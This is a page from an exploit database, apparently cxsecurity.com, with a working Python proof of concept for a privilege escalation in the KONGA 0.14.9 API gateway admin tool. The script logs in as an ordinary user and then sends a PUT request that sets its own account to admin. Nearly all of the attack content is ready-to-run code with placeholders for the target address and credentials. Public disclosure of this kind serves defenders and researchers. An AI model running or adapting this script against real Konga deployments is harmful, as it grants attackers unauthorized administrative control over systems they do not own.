KONGA 0.14.9 Privilege Escalation

2021.11.16
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

# Exploit Title: KONGA 0.14.9 - Privilege Escalation # Date: 10/11/2021 # Exploit Author: Fabricio Salomao & Paulo Trindade (@paulotrindadec) # Vendor Homepage: https://github.com/pantsel/konga # Software Link: https://github.com/pantsel/konga/archive/refs/tags/0.14.9.zip # Version: 0.14.9 # Tested on: Linux - Ubuntu 20.04.3 LTS (focal) import requests import json urlkonga = "http://www.example.com:1337/" # change to your konga address identifier = "usernormalkonga" # change user password = "changeme" # change password headers = { "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Content-Type": "application/json;charset=utf-8", "connection-id": "", "Origin": urlkonga, "Referer": urlkonga } url = urlkonga+"login" data = { "identifier":identifier, "password":password } response = requests.post(url, json=data) json_object = json.loads(response.text) print("[+] Attack") print("[+] Token " + json_object["token"]) url2 = urlkonga+"api/user/"+str(json_object["user"]["id"]) id = json_object["user"]["id"] print("[+] Exploiting User ID "+str(json_object["user"]["id"])) data2 = { "admin": "true", "passports": { "password": password, "protocol": "local" }, "password_confirmation": password, "token":json_object["token"] } print("[+] Change Normal User to Admin") response2 = requests.put(url2, headers=headers, json=data2) print("[+] Success")


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top